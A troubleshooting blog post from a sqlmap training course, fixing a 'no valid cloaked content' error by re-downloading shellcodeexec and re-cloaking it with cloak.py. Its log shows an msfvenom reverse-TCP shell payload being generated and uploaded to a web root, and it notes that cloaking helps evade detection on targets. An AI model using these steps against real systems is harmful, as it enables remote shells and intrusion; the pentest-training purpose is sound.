While working through my Practical Guide to sqlmap for SQL Injections course, I ran into an issue with sqlmap’s included shellcodeexec.
There was an error when decompressing the data, and an error that says that our shellcodeexec.x32_ (or shellcodeexec.x64_) does not contain valid cloaked content.
Full error stack:
[16:59:32] [DEBUG] executing local command: /usr/bin/msfvenom -p linux/x86/shell/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=10.0.2.15 -a x86 -e x86/alpha_mixed -f raw BufferRegister=EAX > "/home/kali/.local/share/sqlmap/output/localhost/tmpmksxy"
[16:59:32] [INFO] creation in progress .... done
[16:59:36] [DEBUG] the shellcode size is 150 bytes
what is the back-end database management system architecture?
 32-bit (default)
 64-bit
> 2
[16:59:37] [INFO] uploading shellcodeexec to '/var/www/html/tmpseksxy'
Error -3 while decompressing data: incorrect header check
ERROR: the provided input file '/home/kali/Documents/sqlmap-dev/extra/shellcodeexec/linux/shellcodeexec.x64_' does not contain valid cloaked content
The solution is really simple, so let’s get to it.
Download a fresh copy of shellcodeexec
Go to the shellcodeexec repo on GitHub (github.com/bdamele/shellcodeexec) and navigate to shellcodeexec/linux/shellcodeexec.x32 (or x64 or Windows DLLs if that’s what you need), copy the URL, and we’ll use wget to download this file:
└─$ wget -O ~/Documents/sqlmap-dev/extra/shellcodeexec/linux/shellcodeexec.x32 "https://github.com/bdamele/shellcodeexec/blob/master/linux/shellcodeexec.x32?raw=true"
Make sure the ?raw=true is there at the end, or you'll download the web page instead!
Where you download the file depends on where you’re running Kali from. If you downloaded Kali from GitHub, you should already know the path. If you’re using the default Kali installation (or whatever other OS you’re running), then you can use this to locate the path:
└─$ which sqlmap
/usr/bin/sqlmap
└─$ ls -l /usr/bin/sqlmap
lrwxrwxrwx 1 root root 25 Feb 2 2021 /usr/bin/sqlmap -> ../share/sqlmap/sqlmap.py
└─$ ls /usr/share/sqlmap
/usr/share/sqlmap/extra/shellcodeexec/linux/ is where you’d want to download it. This will require using wget with sudo though because the directory is owned by root. My ~/Documents/ isn’t owned by root, which is why I didn’t have to sudo.
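A check to run on the downloaded file before the cloak step, as an added example (not part of the original post or of sqlmap): it catches the saved-web-page mistake that a missing ?raw=true causes, and a 32/64-bit mix-up between file name and content. The function names and the constructed sample bytes are assumptions made for illustration.

```python
"""Pre-flight check for a downloaded shellcodeexec binary (added example)."""
import hashlib
import sys
from pathlib import Path

def classify(data: bytes) -> str:
    """Identify a file by its leading bytes."""
    if data[:4] == b"\x7fELF" and len(data) > 4:
        # e_ident[EI_CLASS] is byte 4 of an ELF file: 1 = 32-bit, 2 = 64-bit
        return {1: "elf32", 2: "elf64"}.get(data[4], "elf-unknown")
    if data[:2] == b"MZ":
        return "pe"  # Windows executable or DLL
    if data[:512].lstrip().lower().startswith((b"<!doctype html", b"<html")):
        return "html"
    return "unknown"

# Assumption: the file name suffix states the intended architecture.
EXPECTED = {".x32": "elf32", ".x64": "elf64"}

def check_download(name: str, data: bytes) -> list:
    """Return a list of problems; an empty list means the file looks right."""
    kind = classify(data)
    problems = []
    if kind == "html":
        problems.append("got a web page, not the binary (is ?raw=true on the URL?)")
    for suffix, want in EXPECTED.items():
        if name.endswith(suffix) and kind not in (want, "html"):
            problems.append(f"{name}: expected {want}, found {kind}")
    return problems

def sha256_hex(data: bytes) -> str:
    """Digest to record next to the file so a later change is noticeable."""
    return hashlib.sha256(data).hexdigest()

def load(paths: list) -> dict:
    """Read the files named on the command line, else use constructed samples."""
    if paths:
        return {p: Path(p).read_bytes() for p in paths}
    return {"shellcodeexec.x32": b"\x7fELF\x01\x01\x01" + bytes(9),  # constructed
            "shellcodeexec.x64": b"<!DOCTYPE html><html>"}           # constructed

if __name__ == "__main__":
    failed = False
    for name, blob in load(sys.argv[1:]).items():
        issues = check_download(name, blob)
        print(name, classify(blob), sha256_hex(blob)[:16], issues or "OK")
        failed = failed or bool(issues)
    sys.exit(1 if failed else 0)  # non-zero exit stops a script before cloaking
```
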
Cloak the shellcodeexec
sqlmap includes a cloaking script, cloak.py, in /extra/cloak/. This script is used to encrypt and compress other files. This helps reduce the size of files we may want to upload to our target, and it can help evade detection from security controls on the target system.
So before we can use the newly downloaded shellcodeexec, we need to cloak it. All you need to do is call this script file on the newly-downloaded shellcodeexec file:
┌──(kali㉿kali)-[~/Documents/sqlmap-dev/extra/cloak]
└─$ python3 ~/Documents/sqlmap-dev/extra/cloak/cloak.py -i ./shellcodeexec.x32
(Again, the path where you run this depends on your Kali path and where you downloaded the shellcodeexec file)
You should then see a new version created:
┌──(kali㉿kali)-[~/Documents/sqlmap-dev/extra/cloak]
└─$ ls
shellcodeexec.x32 shellcodeexec.x32_
The new file with the _ is going to be the cloaked version, and it’s the version that sqlmap will automatically use, as long as the file is located where sqlmap will be looking for it, which will be /extra/shellcodeexec/linux/ (for linux) or /extra/shellcodeexec/windows/ (for windows).
You should now be able to re-run whatever command you were trying to use before, and it shouldn’t error out and it shouldn’t say ‘does not contain valid cloaked content’ anymore!